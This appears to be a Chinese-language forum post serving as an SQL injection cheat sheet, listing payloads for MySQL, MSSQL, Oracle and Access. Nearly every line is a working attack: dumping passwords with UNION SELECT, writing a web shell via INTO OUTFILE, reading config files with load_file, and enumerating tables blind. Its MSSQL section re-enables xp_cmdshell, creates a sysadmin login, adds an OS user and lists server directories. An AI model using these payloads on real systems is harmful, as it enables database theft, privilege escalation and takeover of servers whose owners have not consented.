各种数据库注入常识

大鸟，飞起来

1. MySQL注入常用语句/函数-------------
   
2. /*!30000 s
   
3. union select 1,2,3,4,password,6 from manager
   
4. into outfile '/home/web1/shell.php'
   
5. instr(substring(load_file('/home/web1/config.php'),'password'))>0
   
6. ord(substring(load_file('/home/web1/config.php'),1,1))>112
   
7. ord(substring(load_file(0x2F686F6D652F776562312F636F6E6669672E706870),1,1))>112
   
8. 
   
9. MSSQL注入常用语句/函数-------------
   
10. select count(*) FROM master..sysobjects where xtype = 'X' AND name = 'xp_cmdshell'
    
11. And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 //依次得到表名
    
12. And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From syscolumns Where id = OBJECT_ID(NCHAR(78)+NCHAR(101)+NCHAR(119)+NCHAR(115)+NCHAR(95)+NCHAR(85)+NCHAR(115)+NCHAR(101)+NCHAR(114)) Order by colid) T Order by colid desc)>0 //得到列名
    
13. And (Select Cast(Count(1) as varchar(8000))+char(97) From [TableName] Where 1=1)>0 //得到字段的记录个数
    
14. And (Select Top 1 isNull(cast([sName] as varchar(8000)),char(32))+char(124) From (Select Top 1 sName From [TableName] Where 1=1 Order by sName) T Order by sName desc)>0 //得到字段的值
    
15. select IS_SRVROLEMEMBER('sysadmin')
    
16. select user_name()
    
17. EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
    
18. exec master.dbo.sp_addlogin test,test
    
19. exec master.dbo.sp_addsrvrolemember test,sysadmin
    
20. exec master.dbo.sp_password test,123456,test
    
21. exec master.dbo.xp_cmdshell 'net user IWAM-IUSR /add'
    
22. insert into temp(s1) exec master.dbo.xp_cmdshell 'dir d:\web\*.asp /s/a'
    
23. insert into temp(s1) exec master.dbo.xp_subdirs 'd:\'
    
24. insert into temp(s1,s2) exec master.dbo.xp_dirtree 'd:\'
    
25. sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
    
26. ascii('a')=97
    
27. 
    
28. Oracle注入常用语句/函数------------
    
29. 0<>(select count(*) from all_tables) and 1=1
    
30. 0<>(select count(*) from user_tables) and 1=1
    
31. 0<>(select count(*) from user_tab_columns) and 1=1
    
32. 0<>(select count(*) from user_tab_columns where column_name like chr(37)||chr(80)||chr(65)||chr(83)||chr(83)||chr(37)) and 1=1
    
33. chr(97)||chr(98) ascii length substr
    
34. 
    
35. Acess注入常用语句/函数-------------
    
36. exists(select * from admin where asc(mid(username,1,1))>97)
    

复制代码